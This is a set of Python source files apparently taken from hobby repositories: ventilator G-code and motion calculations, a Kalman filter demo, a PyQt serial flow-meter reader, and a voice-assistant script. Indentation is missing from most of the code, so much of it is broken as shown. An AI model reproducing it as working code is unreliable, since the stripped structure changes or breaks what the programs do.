#self.xav = self.xrect * (self.vt / self.vtmax) * self.vtfactor
try:
self.xav = self.calib_dict[self.vt] + self.xavv
print('Dict : ' + str(self.calib_dict[self.vt]))
except Exception as e:
print('ComputeCMV - ' + str(e))
#self.xav = self.xavv
#if self.xavv != 0:
#self.xav = self.xrect * ((self.vt + self.x_adj) / self.vtmax) * self.vtfactor
#Previous Dp self.Dp = self.Dt + self.xav
self.Dp = self.xav
self.TDMS = 0.5
self.Kie = 1/self.ie
self.BCT = 60*(1-0.32) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti > self.xav:
if self.sol2_ti > self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
def ComputeCMV2(self):
self.xavv = self.x_adj
self.Dt = self.xmax - self.xrect
initial_x = self.calib_dict[self.vt] #self.calib_dict[450]
#self.xav = self.calib_dict[self.vt]
#self.xav = self.xrect * (self.vt / self.vtmax) * self.vtfactor
try:
self.xav = initial_x + self.xavv
print('Dict : ' + str(initial_x))
except Exception as e:
print('ComputeCMV - ' + str(e))
#self.xav = self.xavv
#if self.xavv != 0:
#self.xav = self.xrect * ((self.vt + self.x_adj) / self.vtmax) * self.vtfactor
self.Dp = self.Dt + self.xav
# Mod self.Dp = self.xav
self.TDMS = 50
self.Kie = 1/self.ie
#self.BCT = 60*(1-(-0.5)) / self.rr
self.BCT = 60*(1-0.32) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
print('Ti-{:f} Th-{:f} BCT-{:f}'.format(self.Ti, self.Th, self.BCT))
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti > self.xav:
if self.sol2_ti > self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
def GenerateCMV(self):
self.ComputeCMV2()
self.gcodeinit = "G21\r\nG80\r\nG90\r\nM92 X" + str(self.presmm) +" Y"+ str(self.presmm) +"\r\nG28 X0Y0 F500\r\nM92 X" + str(self.postsmm) + " Y" + str(self.postsmm) + "\r\nM906 X"+ str(self.motor_i_min) + " Y" + str(self.motor_i_min) +"\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)
self.gcodeprimary = "G21\r\nG80\r\nG90\r\nM92 X"+ str(self.presmm) +" Y"+ str(self.presmm) + "\r\nM914 X" + str(self.home_sense) + " Y" + str(self.home_sense) +"\r\nG28 X0Y0 F500\r\nM92 X"+ str(self.postsmm) +" Y"+ str(self.postsmm) + "\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC) + "\r\nM906 X"+ str(self.motor_i_min) + " Y" + str(self.motor_i_min) + "\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
#self.gcodeprimary = "G21\r\nG80\r\nG90\r\nM92 X"+ str(self.presmm) +" Y"+ str(self.presmm) +"\r\nG28 X0Y0 F500\r\nM92 X"+ str(self.postsmm) +" Y"+ str(self.postsmm) + "\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC) + "\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
#MOD self.gcodestr = "M107\r\nG01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\nM106 S255\r\nG04 P"+ str(self.TDMS) +"\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
self.gcodestr = "G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+" \r\nG01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n"
#self.gcodestr = "G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n"
#print(self.gcodeinit)
#print("\r\n")
##print("Gcode Primary : ")
##print(self.gcodeprimary)
#self.gcodestr = "M201 X" + str(int(self.ACC_inhale)) + " Y" + str(int(self.ACC_exhale)) + "\r\n" + " G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.Vi))+"\r\n"+ "M201 X"+ str(int(self.ACC_exhale)) + " Y"+ str(int(self.ACC_exhale)) + "\r\n" +" G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.Vh))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
#with open('primary.gcode', 'w') as writer:
#writer.write(self.gcodeprimary)
def GenerateBiPAP(self, pparr, ipap):
self.ComputeBipap(pparr, ipap)
self.gcodeinit = "G21\r\nG80\r\nG90\r\nM92 X80 Y80\r\nG28 X0Y0 F500\r\nM92 X800 Y800\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)
self.gcodeprimary = "G21\r\nG80\r\nG90\r\nG28 X0Y0 F500\r\nM92 X800 Y800\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)+"\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
self.gcodestr = "M107\r\nG01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\nM106 S255\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
```
#### File: jibonaronno/Rhythm/kalman.py
```python
from random import normalvariate
##########################################################################
# "Real world" that we're trying to track
class RealWorld:
def __init__(self):
self.position = 0.0
self.velocity = 0.5
self.time_step = 0.1
self.time = 0.0
self.measure = None
# Noise on the measurements
self.measurement_variance = 3.0
# If we want to kink the profile.
self.change_after = 50
self.changed_velocity = -0.5
def measurement(self):
        if self.measure is None:
self.measure = (self.position + normalvariate(0, self.measurement_variance))
return self.measure
def step(self):
self.time += self.time_step
self.position += self.velocity * self.time_step
if self.time >= self.change_after:
self.velocity = self.changed_velocity
self.measure = None
world = RealWorld()
##########################################################################
# Model
# Estimates
estimate_position = 0.0
estimate_velocity = 0.0
# Covariance matrix
P_xx = 0.1 # Variance of the position
P_xv = 0.1 # Covariance of position and velocity
P_vv = 0.1 # Variance of the velocity
##########################################################################
# Model parameters
position_process_variance = 0.01
velocity_process_variance = 0.01
R = 30.0 # Measurement noise variance
average_length = 30
data = []
print('Time\tActual\tMeasurement\tPosition Estimate\tVelocity Estimate')
for i in range(1000):
world.step()
measurement = world.measurement()
# We need to boot strap the estimates for temperature and
# rate
if i == 0: # First measurement
estimate_position = measurement
elif i == 1: # Second measurement
estimate_velocity = ( measurement - estimate_position ) / world.time_step
estimate_position = measurement
else: # Can apply model
##################################################################
# Temporal update (predictive)
estimate_position += estimate_velocity * world.time_step
# Update covariance
P_xx += world.time_step * ( 2.0 * P_xv + world.time_step * P_vv )
P_xv += world.time_step * P_vv
P_xx += world.time_step * position_process_variance
P_vv += world.time_step * velocity_process_variance
##################################################################
# Observational update (reactive)
vi = 1.0 / ( P_xx + R )
kx = P_xx * vi
kv = P_xv * vi
estimate_position += (measurement - estimate_position) * kx
estimate_velocity += (measurement - estimate_position) * kv
P_xx *= ( 1 - kx )
P_xv *= ( 1 - kx )
P_vv -= kv * P_xv
    print('\t'.join(str(x) for x in [world.time, world.position, measurement, estimate_position, estimate_velocity]))
strx = ""
for x in [world.time, world.position, measurement, estimate_position, estimate_velocity]:
strx += str(x) + ","
strx += "\n"
with open("kalman.csv", "a+") as writer:
writer.write(strx)
```
#### File: jibonaronno/Rhythm/mdiwindow.py
```python
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic
class MainWindow(QtWidgets.QMainWindow):
count = 0
def __init__(self, parent = None):
super(MainWindow, self).__init__(parent)
self.mdi = QMdiArea()
self.setCentralWidget(self.mdi)
bar = self.menuBar()
file = bar.addMenu("Subwindow")
file.addAction("window1")
file.addAction("text1")
file.addAction("text2")
file.triggered[QAction].connect(self.click)
self.setWindowTitle("Multiple window using MDI")
def click(self, q):
print ("New sub window")
if q.text() == "window1":
MainWindow.count = MainWindow.count+1
sub = QMdiSubWindow()
sub.setWidget(QTextEdit())
sub.setWindowTitle("subwindow"+str(MainWindow.count))
self.mdi.addSubWindow(sub)
sub.show()
if q.text() == "text1":
self.mdi.cascadeSubWindows()
if q.text() == "text2":
self.mdi.tileSubWindows()
def main():
app = QApplication(sys.argv)
ex = MainWindow()
ex.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
```
#### File: jibonaronno/Rhythm/modes.py
```python
import enum
class MachineRunModes(enum.Enum):
CMV = 1
BiPAP = 2
CPAP = 3
PS = 4
class BipapReturns(enum.Enum):
Continue = 1
Stop = 2
class BipapLookup(object):
def __init__(self):
self.ipap = 8.0
def setIpap(self, ipap=0.0):
self.ipap = ipap
def lookUp(self, pressure=0.0):
if pressure > self.ipap:
return True
else:
return False
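# Illustrative sketch (not part of the original module): the lookup simply
# reports whether the measured pressure has crossed the configured IPAP level.
if __name__ == "__main__":
    lk = BipapLookup()
    lk.setIpap(12.0)
    print(lk.lookUp(10.5))    # False - still below IPAP
    print(lk.lookUp(12.4))    # True  - IPAP exceeded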
```
#### File: jibonaronno/Rhythm/timerthread.py
```python
import sys
import serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class TimerThread(QObject):
signal = Signal(str)
def __init__(self, callback, milis):
super().__init__()
self.milis = milis
self.signal.connect(callback)
self.thread = QThread()
self.timer = QTimer()
#self.timer.timeout.connect(self.timeout)
#self.timer.start(milis)
self.thread.started.connect(self.init)
def Start(self):
self.thread.start()
@Slot()
def init(self):
self.timer.timeout.connect(self.timeout)
self.timer.start(self.milis)
def timeout(self):
self.signal.emit("tick")
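# Illustrative usage sketch (not part of the original module). TimerThread
# needs a running Qt event loop; the connected callback receives the string
# "tick" every `milis` milliseconds.
if __name__ == "__main__":
    import sys
    from qtpy.QtWidgets import QApplication
    app = QApplication(sys.argv)
    ticker = TimerThread(lambda msg: print("tick received:", msg), 500)
    ticker.Start()
    sys.exit(app.exec_())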
``` |
{
"source": "jibonaronno/RP2040AudioRecord",
"score": 2
} |
#### File: jibonaronno/RP2040AudioRecord/dispatchers.py
```python
import sys
import serial
from serial import Serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class PrimaryThread(QObject):
signal = Signal(str)
def __init__(self, serialPort:Serial, cmdlist):
self.serialPort = serialPort
# self.json = JsonSettings("settings.json")
self.codelist = cmdlist
self.flagStop = False
self.pause = False
super().__init__()
def Stop(self):
self.flagStop = True
@Slot()
def run(self):
unit = []
hexformat = ''
inhex = ''
in_waiting = 0
while True:
try:
if self.pause:
time.sleep(100)
continue
jMessage = ""
try:
#if in_waiting != 0:
#unit = self.serialPort.read(in_waiting)
unit = self.serialPort.readline()
hexformat = unit.decode('ascii')
#for hx in unit:
# hexformat = hexformat + '{0}'.format(hx)
#self.signal.emit(str(hexformat))
self.signal.emit(str(hexformat))
except Exception as e:
print('Ex in sensor Thread readline() 49 : ' + str(e))
'''
for hx in unit:
hexformat = hexformat + '{0:02X} '.format(hx)
if hx == 13:
self.signal.emit(inhex + "- " + hexformat)
hexformat = ''
inhex = ''
unit = b''
'''
except serial.SerialException as ex:
print("Error In SerialException" + ex.strerror)
self.signal.emit("Stopped")
except Exception as e:
pprint.pprint(e)
self.signal.emit("Stopped")
class SensorThread(QObject):
signal = Signal(str)
plst = []
def __init__(self, serialPort, que):
self.pressureque = que
self.serialport = serialPort
self.flagStop = False
self.jMessage = ""
self._beep = False
self.flag_sensorlimit_tx = False
self.strdata = ""
super().__init__()
def Stop(self):
self.flagStop = True
def beep(self):
self._beep = True
def txsensordata(self, strdata):
self.strdata = strdata
self.flag_sensorlimit_tx = True
@Slot()
def run(self):
in_waiting = ''
jMessage = ""
unit = ''
itm = ''
while 1:
if self.flagStop:
break
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0X07 : ' + str(e))
while in_waiting == 0:
time.sleep(0.01)
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0x08 : ' + str(e))
try:
unit = self.serialport.read(in_waiting)
except Exception as e:
print('Ex in sensor Thread readline() 527 : ' + str(e))
if len(unit) > 0:
try:
itm += unit.decode('ascii')
except:
pass
if b'\n' in unit:
jMessage = itm # .decode('ascii')
itm = ''
# jMessage += ',' + str(time.perf_counter())
self.plst = jMessage.split(",")
self.signal.emit(jMessage)
if self.pressureque.qsize() <= 0:
self.pressureque.put(self.plst[0])
if self.flag_sensorlimit_tx:
self.flag_sensorlimit_tx = False
self.serialport.write(self.strdata.encode('utf-8'))
time.sleep(0.5)
```
#### File: jibonaronno/RP2040AudioRecord/main.py
```python
import sys
import enum
from os.path import join, dirname, abspath
import queue
import serial
from serial import Serial
import serial.tools.list_ports as port_list
from qtpy import uic
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt
from qtpy.QtWidgets import QApplication, QMainWindow, QMessageBox, QAction, QDialog, QTableWidgetItem, QLabel
from pyqtgraph import PlotWidget
import pyqtgraph as pg
from collections import deque
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtGui import QPainter
from PyQt5 import QtCore, QtSvg
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGroupBox, QPushButton, QListWidget, QListWidgetItem
import math
import os
import numpy as np
import random
import qtmodern.styles
import qtmodern.windows
import time
import json
import pprint
from portdetection import DetectDevices
from dispatchers import PrimaryThread
from mimic import Mimic
from crud import CRUD
from dataview import DataView
from datetime import datetime
'''
Database code lives in the crud.py file; the object name here is db, accessed via self.db.
It is used in the sensorData(...) callback function. The database file is flow.db.
'''
_UI = join(dirname(abspath(__file__)), 'top.ui')
_UI2 = join(dirname(abspath(__file__)), 'dashboard.ui')
_UI3 = join(dirname(abspath(__file__)), 'commands.ui')
'''
dev_address  function_code  reg_addr_high  reg_addr_low  reg_qty_high  reg_qty_low  crc_low  crc_high
'''
#08 04 00 00 00 02 71 52
_CMD_1 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_2 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_3 = [0x08, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD1, 0x58]
_CMD_4 = [0x08, 0x04, 0x00, 0x04, 0x00, 0x02, 0x30, 0x93]
_CMD_5 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_6 = [0x08, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD1, 0x58]
_CMD_7 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_8 = [0x08, 0x04, 0x00, 0x04, 0x00, 0x02, 0x30, 0x93]
_CMD_9 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_10 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_11 = [0x09, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0x89]
_CMD_12 = [0x09, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x42]
_CMD_13 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x31, 0x42]
_CMD_14 = [0x09, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0x89]
_CMD_15 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_16 = [0x09, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x42]
_CMD_17 = [0x0A, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0xB0]
_CMD_18 = [0x0A, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0xBA]
_CMD_19 = [0x0A, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x71]
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.widget = uic.loadUi(_UI, self)
        self.window_title = "top"
        self.mimic = Mimic()
self.ports = DetectDevices()
self.selectedPort = ""
self.lst = QListWidget()
self.sensor = ''
self.sensorThread = ''
self.sensorThreadCreated = False
self.sensorPortOpen = False
self.sensorDataString = ""
self.serialSensor = ""
self.selectedPort = ""
self.cmdlist = []
self.cmdlist.append(_CMD_1)
self.cmdlist.append(_CMD_2)
self.cmdlist.append(_CMD_3)
self.cmdlist.append(_CMD_4)
self.cmdlist.append(_CMD_5)
self.cmdlist.append(_CMD_6)
self.cmdlist.append(_CMD_7)
self.cmdlist.append(_CMD_8)
self.cmdlist.append(_CMD_9)
self.cmdlist.append(_CMD_10)
self.cmdlist.append(_CMD_11)
self.cmdlist.append(_CMD_12)
self.cmdlist.append(_CMD_13)
self.cmdlist.append(_CMD_14)
self.cmdlist.append(_CMD_15)
self.cmdlist.append(_CMD_16)
self.cmdlist.append(_CMD_17)
self.cmdlist.append(_CMD_18)
self.cmdlist.append(_CMD_19)
        # List available serial ports in the self.portListBox QListWidget (the usb-ttl filter below is commented out)
self.ports = list(port_list.comports())
for p in self.ports:
#if "usb" in p[1]:
self.portListBox.addItem(p[0])
self.btn1.setEnabled(False)
self.btn2.setEnabled(True)
#self.lst.selectedItems()
# getting item changed signal
self.portListBox.currentItemChanged.connect(self.portLstItemChanged)
self.db = CRUD("flow.db")
self.db.openDBHard()
self.dtv = DataView()
# renderer = QtSvg.QSvgRenderer('ico1.svg')
# painter = QPainter(self.btn1)
# painter.restore()
# renderer.render(painter)
# self.btn1.show()
def portLstItemChanged(self, tm):
print("Port Item Changed " + tm.text())
self.selectedPort = tm.text()
if tm.text() != "":
#if "USB" in tm.text():
self.btn1.setEnabled(True)
def startSensorThread(self):
if self.sensorPortOpen:
if not self.sensorThreadCreated:
self.sensor = PrimaryThread(self.serialSensor, self.cmdlist)
self.sensorThread = QThread()
self.sensorThread.started.connect(self.sensor.run)
self.sensor.signal.connect(self.sensorData)
self.sensor.moveToThread(self.sensorThread)
self.sensorThread.start()
self.sensorThreadCreated = True
print("Starting Sensor Thread")
def extractFlowData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if(len(parts) >= 18):
#val = int('0x' + parts[15]+parts[16]+parts[17]+parts[18], base=16)
val = int(parts[12]+parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
def extractSumData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if(len(parts) >= 18):
val = int(parts[12]+parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
def extractPercentData(self, starData=""):
parts = starData.split(" ")
res = "0000.00"
if (len(parts) >= 18):
#val = int(parts[12] + parts[13] + parts[14] + parts[15], base=16)
val = int(parts[12] + parts[13], base=16)
if val > 0:
res = str(val/1000)
else:
res = 0
return res
#Data Received from thread. parts[12] is dev id. Not Applicable now.
#12-13-2021 23:40:37 - [8, 4, 0, 0, 0, 2, 113, 82] - 08 04 04 00 1A 00 00 43 43 . Terminal data is shown as below
#08 04 00 00 00 02 71 52 - 08 04 04 00 A1 00 00 43 43
# return data: dev id - F.code - Bytes Count - B3 B2 B1 B0 - CRC - CRC
# 08 04 04 00 1A 00 00 - 43 - 43
def sendMeterDataFromSensorString(self, sensorString:str):
parts = sensorString.split(" ")
devid = 0
if(len(parts) >= 18):
#print(parts[0] + " " +parts[9] + " " +parts[10] + " " +parts[11] + " " + parts[12])
if(int(parts[9], base=16) == 8):
devid = 8
if(int(parts[3], base=16) == 0):
self.mimic.meterFlow1 = self.extractFlowData(sensorString)
self.mimic.AppendFlow1(float(self.extractFlowData(sensorString)))
if(int(parts[3], base=16) == 34):
self.mimic.meterSum1 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
#self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 1: " + sensorString)
if (int(parts[9], base=16) == 9):
devid = 9
if (int(parts[3], base=16) == 0):
self.mimic.meterFlow2 = self.extractFlowData(sensorString)
if (int(parts[3], base=16) == 34):
self.mimic.meterSum2 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
# self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 2: " + sensorString)
if (int(parts[9], base=16) == 10):
devid = 10
if (int(parts[3], base=16) == 0):
self.mimic.meterFlow3 = self.extractFlowData(sensorString)
if (int(parts[3], base=16) == 34):
self.mimic.meterSum3 = self.extractSumData(sensorString)
if (int(parts[3], base=16) == 4):
# self.mimic.meterSum1 = self.extractSumData(sensorString)
print("PERCENT 3: " + sensorString)
return devid
def sensorData(self, data_stream):
self.sensorDataString = data_stream
#strdatetime = datetime.today().strftime('%m-%d-%Y %H:%M:%S') #Collect Present Date Time
#print(strdatetime + " - " +self.sensorDataString) #
#print(self.sensorDataString)
self.msgListBox.addItem(self.sensorDataString) #Insert incomming data to local List Box
try:
self.mimic.AppendFlow1(float(self.sensorDataString))
except Exception as e:
pass
#devid = self.sendMeterDataFromSensorString(self.sensorDataString)
#self.db.insert_meter_data([strdatetime, self.sensorDataString, str(devid)]) # Inserting data to database
#self.mimic.repaint()
if(self.msgListBox.count() > 10):
self.msgListBox.clear()
@Slot()
def on_btn1_clicked(self):
if self.selectedPort != "":
if not self.sensorPortOpen:
try:
self.serialSensor = serial.Serial(self.selectedPort, baudrate=115200, timeout=2)
self.sensorPortOpen = True
except serial.SerialException as ex:
self.sensorPortOpen = False
print(ex.strerror)
print("Error Opening Serial Port..........................................")
finally:
print("Serial Port Connected..........................")
self.btn2.setEnabled(True)
# self.mim = Mimic()
# self.mim.setFixedHeight(100)
# self.VL0.addWidget(self.mim)
# self.setWindowTitle(self.window_title)
#Show svg file svgwidget
#self.svgwidget = QtSvg.QSvgWidget('ico1.svg')
#comment self.VL1 = QVBoxLayout()
#self.VL0.addWidget(self.svgwidget)
#comment self.dash.show()
@Slot()
def on_btn2_clicked(self):
#self.mimic.show()
if self.sensorPortOpen:
if not self.sensorThreadCreated:
self.startSensorThread()
self.mimic.show()
@Slot()
def on_btn3_clicked(self):
''' Example code to insert data in database
#self.db.insert_meter_data_hard()
'''
self.dtv.summery = True
self.dtv.showNormal()
@Slot()
def on_btn4_clicked(self):
self.dtv.summery = None
self.dtv.showNormal()
@Slot()
def on_btnPause_clicked(self):
if self.btnPause.text() == "Pause":
self.btnPause.setText("Start")
self.sensor.pause = True
else:
self.btnPause.setText("Pause")
self.sensor.pause = False
if __name__ == '__main__':
app = QApplication(sys.argv)
#qtmodern.styles.dark(app)
qtmodern.styles.light(app)
mw_class_instance = MainWindow()
mw = qtmodern.windows.ModernWindow(mw_class_instance)
#mw.showFullScreen()
mw.showNormal()
sys.exit(app.exec_())
```
#### File: jibonaronno/RP2040AudioRecord/paraview.py
```python
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
'''
This class shows and sets parameters for a selected object. A JSON structure defines
the parameter layout. The object is referred to as params.
'''
class Paraview(QWidget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
``` |
{
"source": "JIboncb/Jibon",
"score": 3
} |
#### File: JIboncb/Jibon/main.py
```python
import speech_recognition as sr
import datetime
import wikipedia
import webbrowser
import pyttsx3
import pywhatkit
import pyjokes
import rotatescreen
import os
import PyPDF2
from textblob import TextBlob
import platform
import calendar
import cowsay
from translate import Translator
import sounddevice
from scipy.io.wavfile import write
from speedtest import Speedtest
import psutil
import time  # needed for time.sleep() in the rotate-screen command below
print('Initializing Julie')
# variables section
home = 'Panchagarh'
live_in = 'Dinajpur'
boss = 'Sir'
ai_name = 'Julie'
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
# wishMe function
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour>=0 and hour<12:
speak('Good morning sir')
elif hour>=12 and hour<18:
speak('Good afternoon sir')
else:
speak('Good evening sir')
speak('How can I help you')
# command taking function
def takeCommand():
r = sr.Recognizer()
with sr.Microphone() as source:
print('Listening...')
audio = r.listen(source)
try :
print('Recognizing...')
query = r.recognize_google(audio, language= 'en-in')
query = query.lower()
print(f"User said: {query}\n")
    except Exception as e:
        print(e)
        print("Say that again please")
        query = ""  # avoid returning an unbound name when recognition fails
    return query
# programme start
speak('Initializing')
speak(ai_name)
wishMe()
# if elif section
while True:
query = takeCommand()
print(query)
if 'wikipedia' in query:
speak('Searching wikipedia...')
query = query.replace('wikipedia', '')
results = wikipedia.summary(query, sentences=2)
print(results)
speak(results)
elif 'open youtube' in query.lower():
speak('Opening youtube')
url = 'youtube.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open facebook' in query.lower():
speak('Opening facebook')
url = 'facebook.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open google' in query.lower():
speak('Opening google')
url = 'google.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'open stackoverflow' in query.lower():
speak('Opening stackoverflow')
url = 'stackoverflow.com'
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open(url)
elif 'joke' in query:
speak(pyjokes.get_joke())
elif 'play' in query:
song = query.replace('play', '')
speak('playing ' + song)
pywhatkit.playonyt(song)
elif 'time' in query:
        current_time = datetime.datetime.now().strftime('%I:%M %p')
        speak('Current time is ' + current_time)
elif 'who is' in query:
speak('Searching wikipedia...')
query = query.replace('who is', '')
results = wikipedia.summary(query, sentences=2)
print(results)
speak(results)
elif "where is" in query:
query = query.replace("where is", "")
location = query
speak("User asked to Locate")
speak(location)
chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
webbrowser.get(chrome_path).open('https://www.google.com/maps/place/' + location)
elif 'go on a date' in query:
speak('sorry sir, I can not go with you, because i am an AI')
elif 'who are you' in query:
speak('i am an ai assistant created by Jibon')
elif 'created you' in query:
speak('i have been created by Jibon')
elif 'are you single' in query:
speak('I am finding the perfect one')
elif 'be my girlfriend' in query:
speak('Maybe you should give me some time')
